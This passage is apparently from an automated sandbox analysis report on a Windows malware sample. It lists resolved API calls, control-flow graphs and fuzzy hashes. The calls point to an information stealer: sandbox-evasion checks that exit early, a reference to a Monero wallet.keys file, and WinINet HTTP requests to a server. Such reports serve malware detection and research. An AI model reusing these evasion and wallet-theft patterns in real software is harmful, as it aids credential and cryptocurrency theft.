                              • GetProcAddress.KERNEL32(73B50000,0117AE50), ref: 004CA160
                              • GetProcAddress.KERNEL32(73B50000,01176240), ref: 004CA179
                              • GetProcAddress.KERNEL32(73B50000,0117AEF0), ref: 004CA191
                              • GetProcAddress.KERNEL32(73B50000,0118C600), ref: 004CA1A9
                              • GetProcAddress.KERNEL32(73B50000,0118C528), ref: 004CA1C2
                              • GetProcAddress.KERNEL32(73B50000,01176580), ref: 004CA1DA
                              • GetProcAddress.KERNEL32(73B50000,011765A0), ref: 004CA1F2
                              • GetProcAddress.KERNEL32(73B50000,0118C5E8), ref: 004CA20B
                              • GetProcAddress.KERNEL32(760B0000,011762E0), ref: 004CA22C
                              • GetProcAddress.KERNEL32(760B0000,01176560), ref: 004CA244
                              • GetProcAddress.KERNEL32(760B0000,0118C390), ref: 004CA25D
                              • GetProcAddress.KERNEL32(760B0000,0118C408), ref: 004CA275
                              • GetProcAddress.KERNEL32(760B0000,01176220), ref: 004CA28D
                              • GetProcAddress.KERNEL32(75D30000,0117AF90), ref: 004CA2B3
                              • GetProcAddress.KERNEL32(75D30000,0117AD88), ref: 004CA2CB
                              • GetProcAddress.KERNEL32(75D30000,0118C3F0), ref: 004CA2E3
                              • GetProcAddress.KERNEL32(75D30000,01176440), ref: 004CA2FC
                              • GetProcAddress.KERNEL32(75D30000,01176540), ref: 004CA314
                              • GetProcAddress.KERNEL32(75D30000,0117ADD8), ref: 004CA32C
                              • GetProcAddress.KERNEL32(753A0000,0118C348), ref: 004CA352
                              • GetProcAddress.KERNEL32(753A0000,011764C0), ref: 004CA36A
                              • GetProcAddress.KERNEL32(753A0000,01188A58), ref: 004CA382
                              • GetProcAddress.KERNEL32(753A0000,0118C378), ref: 004CA39B
                              • GetProcAddress.KERNEL32(753A0000,0118C3A8), ref: 004CA3B3
                              • GetProcAddress.KERNEL32(753A0000,01176300), ref: 004CA3CB
                              • GetProcAddress.KERNEL32(753A0000,011761C0), ref: 004CA3E4
                              • GetProcAddress.KERNEL32(753A0000,0118C558), ref: 004CA3FC
                              • GetProcAddress.KERNEL32(753A0000,0118C4C8), ref: 004CA414
                              • GetProcAddress.KERNEL32(76DA0000,01176320), ref: 004CA436
                              • GetProcAddress.KERNEL32(76DA0000,0118C5A0), ref: 004CA44E
                              • GetProcAddress.KERNEL32(76DA0000,0118C4B0), ref: 004CA466
                              • GetProcAddress.KERNEL32(76DA0000,0118C360), ref: 004CA47F
                              • GetProcAddress.KERNEL32(76DA0000,0118C4F8), ref: 004CA497
                              • GetProcAddress.KERNEL32(77300000,01176420), ref: 004CA4B8
                              • GetProcAddress.KERNEL32(77300000,01176340), ref: 004CA4D1
                              • GetProcAddress.KERNEL32(767E0000,01176200), ref: 004CA4F2
                              • GetProcAddress.KERNEL32(767E0000,0118C420), ref: 004CA50A
                              • GetProcAddress.KERNEL32(6F6A0000,01176260), ref: 004CA530
                              • GetProcAddress.KERNEL32(6F6A0000,011763C0), ref: 004CA548
                              • GetProcAddress.KERNEL32(6F6A0000,011762A0), ref: 004CA560
                              • GetProcAddress.KERNEL32(6F6A0000,0118C438), ref: 004CA579
                              • GetProcAddress.KERNEL32(6F6A0000,01176480), ref: 004CA591
                              • GetProcAddress.KERNEL32(6F6A0000,01176360), ref: 004CA5A9
                              • GetProcAddress.KERNEL32(6F6A0000,011763A0), ref: 004CA5C2
                              • GetProcAddress.KERNEL32(6F6A0000,01176380), ref: 004CA5DA
                              • GetProcAddress.KERNEL32(6F6A0000,InternetSetOptionA), ref: 004CA5F1
                              • GetProcAddress.KERNEL32(6F6A0000,HttpQueryInfoA), ref: 004CA607
                              • GetProcAddress.KERNEL32(75760000,0118C450), ref: 004CA629
                              • GetProcAddress.KERNEL32(75760000,011889A8), ref: 004CA641
                              • GetProcAddress.KERNEL32(75760000,0118C480), ref: 004CA659
                              • GetProcAddress.KERNEL32(75760000,0118C468), ref: 004CA672
                              • GetProcAddress.KERNEL32(762C0000,011764A0), ref: 004CA693
                              • GetProcAddress.KERNEL32(6EBB0000,0118C5D0), ref: 004CA6B4
                              • GetProcAddress.KERNEL32(6EBB0000,011763E0), ref: 004CA6CD
                              • GetProcAddress.KERNEL32(6EBB0000,0118C498), ref: 004CA6E5
                              • GetProcAddress.KERNEL32(6EBB0000,0118C4E0), ref: 004CA6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: f0bd87241f146168771100699120852ada7be3abe81ebbfcc3f1e30e4589b5f9
                              • Instruction ID: 6766c9f59a01253df8c598b7c447f47a9be9408917ce06df79b4e9fac7955699
                              • Opcode Fuzzy Hash: f0bd87241f146168771100699120852ada7be3abe81ebbfcc3f1e30e4589b5f9
                              • Instruction Fuzzy Hash: 126229FA600201AFC344EFE9ED88DB637FBF74C241714A61AE61DC3264D679A841DB52

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1033 4b6280-4b630b call 4ca7a0 call 4b47b0 call 4ca740 InternetOpenA StrCmpCA 1040 4b630d 1033->1040 1041 4b6314-4b6318 1033->1041 1040->1041 1042 4b6509-4b6525 call 4ca7a0 call 4ca800 * 2 1041->1042 1043 4b631e-4b6342 InternetConnectA 1041->1043 1062 4b6528-4b652d 1042->1062 1045 4b6348-4b634c 1043->1045 1046 4b64ff-4b6503 InternetCloseHandle 1043->1046 1047 4b635a 1045->1047 1048 4b634e-4b6358 1045->1048 1046->1042 1050 4b6364-4b6392 HttpOpenRequestA 1047->1050 1048->1050 1052 4b6398-4b639c 1050->1052 1053 4b64f5-4b64f9 InternetCloseHandle 1050->1053 1055 4b639e-4b63bf InternetSetOptionA 1052->1055 1056 4b63c5-4b6405 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1046 1055->1056 1058 4b642c-4b644b call 4c8940 1056->1058 1059 4b6407-4b6427 call 4ca740 call 4ca800 * 2 1056->1059 1066 4b64c9-4b64e9 call 4ca740 call 4ca800 * 2 1058->1066 1067 4b644d-4b6454 1058->1067 1059->1062 1066->1062 1069 4b64c7-4b64ef InternetCloseHandle 1067->1069 1070 4b6456-4b6480 InternetReadFile 1067->1070 1069->1053 1073 4b648b 1070->1073 1074 4b6482-4b6489 1070->1074 1073->1069 1074->1073 1078 4b648d-4b64c5 call 4ca9b0 call 4ca8a0 call 4ca800 1074->1078 1078->1070
                              APIs
                                • Part of subcall function 004CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 004CA7E6
                                • Part of subcall function 004B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004B4839
                                • Part of subcall function 004B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 004B4849
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                              • InternetOpenA.WININET(004D0DFE,00000001,00000000,00000000,00000000), ref: 004B62E1
                              • StrCmpCA.SHLWAPI(?,0118E2D0), ref: 004B6303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004B6335
                              • HttpOpenRequestA.WININET(00000000,GET,?,0118DA58,00000000,00000000,00400100,00000000), ref: 004B6385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004B63BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004B63D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004B63FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004B646D
                              • InternetCloseHandle.WININET(00000000), ref: 004B64EF
                              • InternetCloseHandle.WININET(00000000), ref: 004B64F9
                              • InternetCloseHandle.WININET(00000000), ref: 004B6503
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: 8244b7f1567b97490c7f98a5877f9a0720818e0d627b3114048db405f77cb595
                              • Instruction ID: 5c7414ff9428aff1e149a6a9a12dd3d9920a6051fab1dccc310df2803df757aa
                              • Opcode Fuzzy Hash: 8244b7f1567b97490c7f98a5877f9a0720818e0d627b3114048db405f77cb595
                              • Instruction Fuzzy Hash: CA718075A00208ABDB24EFE0DC49FEE7775BB44704F10815EF5096B290DBB86A85CF66

Control-flow Graph: function 4c5510-4c5ac6 (graph data not reproduced)
                              APIs
                                • Part of subcall function 004CA820: lstrlen.KERNEL32(004B4F05,?,?,004B4F05,004D0DDE), ref: 004CA82B
                                • Part of subcall function 004CA820: lstrcpy.KERNEL32(004D0DDE,00000000), ref: 004CA885
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004C5644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004C56A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004C5857
                                • Part of subcall function 004CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 004CA7E6
                                • Part of subcall function 004C51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004C5228
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                                • Part of subcall function 004C52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004C5318
                                • Part of subcall function 004C52C0: lstrlen.KERNEL32(00000000), ref: 004C532F
                                • Part of subcall function 004C52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 004C5364
                                • Part of subcall function 004C52C0: lstrlen.KERNEL32(00000000), ref: 004C5383
                                • Part of subcall function 004C52C0: lstrlen.KERNEL32(00000000), ref: 004C53AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004C578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004C5940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004C5A0C
                              • Sleep.KERNEL32(0000EA60), ref: 004C5A1B
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 15809f2a56e9546e00d455d01d6900620b921307455f34c6cd8e9e2ff30d49d8
                              • Instruction ID: db212b39166dfd47b76d51234095384f43e0da0aade13c72f9107b50161ab122
                              • Opcode Fuzzy Hash: 15809f2a56e9546e00d455d01d6900620b921307455f34c6cd8e9e2ff30d49d8
                              • Instruction Fuzzy Hash: 73E16179910108ABCB54FBA1DC56FFD7339AF54308F50812EB40652191EF38AE59CBBA

Control-flow Graph: function 4c17a0-4c19cd (graph data not reproduced)
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 004C17C5
                              • ExitProcess.KERNEL32 ref: 004C17D1
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: 3b14a3861789d38619e7875102fc76480e408e8bc900efae580f7d2cc4d90b15
                              • Instruction ID: fb93b732c8cc1c9677fe2a56c8100b82a6dd313923d6e808c48c79960ef22587
                              • Opcode Fuzzy Hash: 3b14a3861789d38619e7875102fc76480e408e8bc900efae580f7d2cc4d90b15
                              • Instruction Fuzzy Hash: 79517DB8A04209EBCB44DFA1C954FBE77B6AF45704F10404EE40967361D778D952CB6A

Control-flow Graph: function 4c7500-4c768e (graph data not reproduced)
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004C7542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004C757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004C7603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C760A
                              • wsprintfA.USER32 ref: 004C7640
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\$M
                              • API String ID: 1544550907-2588915378
                              • Opcode ID: eaa142da3af37b725ddae90fb7c92627cf393378eac78d77c8c6c78293922f93
                              • Instruction ID: 1669cc2cae9f9fbf2d409581fb67ebef50837b9eb9d46aa15e080a4c727f5f35
                              • Opcode Fuzzy Hash: eaa142da3af37b725ddae90fb7c92627cf393378eac78d77c8c6c78293922f93
                              • Instruction Fuzzy Hash: B14181B5D04248ABDB50DF94DC45FEEBBB8AF08714F10419DF509A7280DB78AA44CFA9

                              Control-flow Graph

                              APIs
                                • Part of subcall function 004C9860: GetProcAddress.KERNEL32(76F70000,01180690), ref: 004C98A1
                                • Part of subcall function 004C9860: GetProcAddress.KERNEL32(76F70000,01180630), ref: 004C98BA
                                • Part of subcall function 004C9860: GetProcAddress.KERNEL32(76F70000,011806F0), ref: 004C98D2
                                • Part of subcall function 004C9860: GetProcAddress.KERNEL32(76F70000,011807B0), ref: 004C98EA
                                • Part of subcall function 004C9860: GetProcAddress.KERNEL32(76F70000,011806C0), ref: 004C9903
                                • Part of subcall function 004C9860: GetProcAddress.KERNEL32(76F70000,011889D8), ref: 004C991B
                                • Part of subcall function 004C9860: GetProcAddress.KERNEL32(76F70000,011767E0), ref: 004C9933
                                • Part of subcall function 004C9860: GetProcAddress.KERNEL32(76F70000,011768E0), ref: 004C994C
                                • Part of subcall function 004C9860: GetProcAddress.KERNEL32(76F70000,011806D8), ref: 004C9964
                                • Part of subcall function 004C9860: GetProcAddress.KERNEL32(76F70000,01180720), ref: 004C997C
                                • Part of subcall function 004C9860: GetProcAddress.KERNEL32(76F70000,01180750), ref: 004C9995
                                • Part of subcall function 004C9860: GetProcAddress.KERNEL32(76F70000,01180768), ref: 004C99AD
                                • Part of subcall function 004C9860: GetProcAddress.KERNEL32(76F70000,01176800), ref: 004C99C5
                                • Part of subcall function 004C9860: GetProcAddress.KERNEL32(76F70000,01180780), ref: 004C99DE
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004B11D0: ExitProcess.KERNEL32 ref: 004B1211
                                • Part of subcall function 004B1160: GetSystemInfo.KERNEL32(?), ref: 004B116A
                                • Part of subcall function 004B1160: ExitProcess.KERNEL32 ref: 004B117E
                                • Part of subcall function 004B1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 004B112B
                                • Part of subcall function 004B1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 004B1132
                                • Part of subcall function 004B1110: ExitProcess.KERNEL32 ref: 004B1143
                                • Part of subcall function 004B1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004B123E
                                • Part of subcall function 004B1220: ExitProcess.KERNEL32 ref: 004B1294
                                • Part of subcall function 004C6770: GetUserDefaultLangID.KERNEL32 ref: 004C6774
                                • Part of subcall function 004B1190: ExitProcess.KERNEL32 ref: 004B11C6
                                • Part of subcall function 004C7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004B11B7), ref: 004C7880
                                • Part of subcall function 004C7850: RtlAllocateHeap.NTDLL(00000000), ref: 004C7887
                                • Part of subcall function 004C7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 004C789F
                                • Part of subcall function 004C78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004C7910
                                • Part of subcall function 004C78E0: RtlAllocateHeap.NTDLL(00000000), ref: 004C7917
                                • Part of subcall function 004C78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 004C792F
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01188AA8,?,004D110C,?,00000000,?,004D1110,?,00000000,004D0AEF), ref: 004C6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004C6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 004C6AF9
                              • Sleep.KERNEL32(00001770), ref: 004C6B04
                              • CloseHandle.KERNEL32(?,00000000,?,01188AA8,?,004D110C,?,00000000,?,004D1110,?,00000000,004D0AEF), ref: 004C6B1A
                              • ExitProcess.KERNEL32 ref: 004C6B22
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2931873225-0
                              • Opcode ID: 0d9ca6ed4a00429c3d643191975976ebddc8da5d2a71e88c257102880acd4fe8
                              • Instruction ID: 8b1ee94051c128d5bdc0327fb70d8649dd69add18c0a27a4593c8df1419d2c73
                              • Opcode Fuzzy Hash: 0d9ca6ed4a00429c3d643191975976ebddc8da5d2a71e88c257102880acd4fe8
                              • Instruction Fuzzy Hash: 8B311CB8900108ABDB44FBE2DC56FEE7779AF04348F50451EF202A2191DF786915CABE

Control-flow Graph: function 4c6aba-4c6b22 (graph data not reproduced)
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01188AA8,?,004D110C,?,00000000,?,004D1110,?,00000000,004D0AEF), ref: 004C6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004C6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 004C6AF9
                              • Sleep.KERNEL32(00001770), ref: 004C6B04
                              • CloseHandle.KERNEL32(?,00000000,?,01188AA8,?,004D110C,?,00000000,?,004D1110,?,00000000,004D0AEF), ref: 004C6B1A
                              • ExitProcess.KERNEL32 ref: 004C6B22
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: 0b384ce33052bc1f5ef86e823c8237398da12b642f7d527bac5d532fcc404365
                              • Instruction ID: 6ea4ed1a3d8d422d1954379ba8f05c7f31438746645994b8684cbbae549d4002
                              • Opcode Fuzzy Hash: 0b384ce33052bc1f5ef86e823c8237398da12b642f7d527bac5d532fcc404365
                              • Instruction Fuzzy Hash: 15F090B8900219AAE780EBA19C06F7E7B34EB04304F10841EB506A1180DBB92941D65B

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004B4839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 004B4849
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: 39be8ee56da0f799ed4027cef4d5ff6c41a0b2c26416f209df2660bb86246cab
                              • Instruction ID: 63b5bd6c7fe39c5d1d6157f486fe45f265f68ad30a21baa5a98a501126440dd5
                              • Opcode Fuzzy Hash: 39be8ee56da0f799ed4027cef4d5ff6c41a0b2c26416f209df2660bb86246cab
                              • Instruction Fuzzy Hash: ED2150B5D00208ABDF10EFA5E845BDE7779FB45310F108629F515A7280DB706609CB91

                              Control-flow Graph

                              APIs
                                • Part of subcall function 004CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 004CA7E6
                                • Part of subcall function 004B6280: InternetOpenA.WININET(004D0DFE,00000001,00000000,00000000,00000000), ref: 004B62E1
                                • Part of subcall function 004B6280: StrCmpCA.SHLWAPI(?,0118E2D0), ref: 004B6303
                                • Part of subcall function 004B6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004B6335
                                • Part of subcall function 004B6280: HttpOpenRequestA.WININET(00000000,GET,?,0118DA58,00000000,00000000,00400100,00000000), ref: 004B6385
                                • Part of subcall function 004B6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004B63BF
                                • Part of subcall function 004B6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004B63D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004C5228
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: 0e10967da18628d65996e6ae60998a3c66cde4f7b889b2350e9b5f75234bb327
                              • Instruction ID: c11fc3febe75b6e5057bf35318b1f89b26d75b72f6186cfa854fccefbb2e6e19
                              • Opcode Fuzzy Hash: 0e10967da18628d65996e6ae60998a3c66cde4f7b889b2350e9b5f75234bb327
                              • Instruction Fuzzy Hash: 9F11213490000CA7CB54FF62DD52FED7378AF50308F90415EF81A46592EF38AB16CAAA

                              Control-flow Graph

                              Control-flow graph (rendered image; legend: Executed / Not Executed). Blocks and edges recovered from the graph text:
                              • 1493: 4b1220-4b1247, call 4c89b0, GlobalMemoryStatusEx → 1496, 1497
                              • 1496: 4b1249-4b1271, call 4cda00 × 2 → 1499
                              • 1497: 4b1273-4b127a → 1499
                              • 1499: 4b1281-4b1285 → 1501, 1502
                              • 1501: 4b129a-4b129d
                              • 1502: 4b1287 → 1503, 1504
                              • 1503: 4b1289-4b1290 → 1501, 1504
                              • 1504: 4b1292-4b1294, ExitProcess
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004B123E
                              • ExitProcess.KERNEL32 ref: 004B1294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 803317263-2766056989
                              • Opcode ID: b3b27d467f0b7957a7bee067ba53aed410b0da9d87782bfa3950d208e04e9530
                              • Instruction ID: bd97ba23fb1d8163ac84340cda6c390ee91dfa4f9be1ea5af91ffdf57d05b4ac
                              • Opcode Fuzzy Hash: b3b27d467f0b7957a7bee067ba53aed410b0da9d87782bfa3950d208e04e9530
                              • Instruction Fuzzy Hash: 27014FB0D40308AAEB14DBE0DC49BAEB778AB14705F60805AE605B6290D678654187AD
                              APIs
                              • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 008A6EB5
                              • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 008A6EDC
                              • GetNativeSystemInfo.KERNEL32(?), ref: 008A6F33
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
